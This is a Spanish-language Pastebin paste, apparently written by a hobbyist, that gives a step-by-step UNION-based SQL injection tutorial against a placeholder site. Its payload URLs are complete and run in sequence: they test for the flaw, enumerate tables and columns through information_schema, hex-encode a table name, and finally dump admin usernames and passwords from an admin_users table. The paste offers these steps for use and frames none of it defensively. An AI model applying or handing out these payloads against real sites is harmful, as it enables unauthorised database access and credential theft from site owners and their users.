Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://www.tupagina.com/contenido.php?id=6' para saber si es vulnerable
- http://www.tupagina.com/contenido.php?id=-6+union+select+1,2,3,4,5,6,7--
- y nos muestra 2 y 3 es la tablas
- usaremos el 2 y ponemos esto = replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29
- y al final de la url ponemos esto = +from+information_schema.tables--
- 2 paso = nos vamos a esta pag= http://www.swingnote.com/tools/texttohex.php
- y en string borramos y ponemos la table que queremos convertir y nos dara el Hexadecimal ^^
- en mi caso fue 61646d696e5f7573657273
- 3 paso = borramos el código que aviamos puesto antes este replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 y lo remplasamos por column_name
- y al final le ponemos este codigo = columns+where(table_name=0xaqui el codigo)limit+1,1--
- luego donde dic aquí el codigo que convertimos lo ponemos y en tables borramos y ponemos el codigo
- fin del codigo http://www.tupagina.com/contenido.php?id=-6+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e5f7573657273)limit+1,1--
- despues ponemos en los numeros de están +1,1-- de 1 a 2 y 3 esto es para que vaya revelando las columnas
- 4 paso == revelar culumnas borramos column_name y ponemos esto = group_concat(admin_username,0x3a,admin_password)
- son las columnas q keremos revelar y al final borrar de información todo y ponemos terminar con el nombre de la tabla ;)
- +admin_users
- codigo final
- http://www.tupagina.com/contenido.php?id=-6+union+select+1,group_concat(admin_username,0x3a,admin_password),3,4,5,6,7+from+admin_users--
- ####################################################################################
- Facebook: https://www.facebook.com/Claudiospik3
- Twitter: https://twitter.com/Claudiospik3
- Blog: http://claudiospik3.blogspot.com
- Página: http://Claudiospik3.tuars.com ( En actualización )
- E-mail: Claudiospik3@gmail.com
- Gracias por visitarnos
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement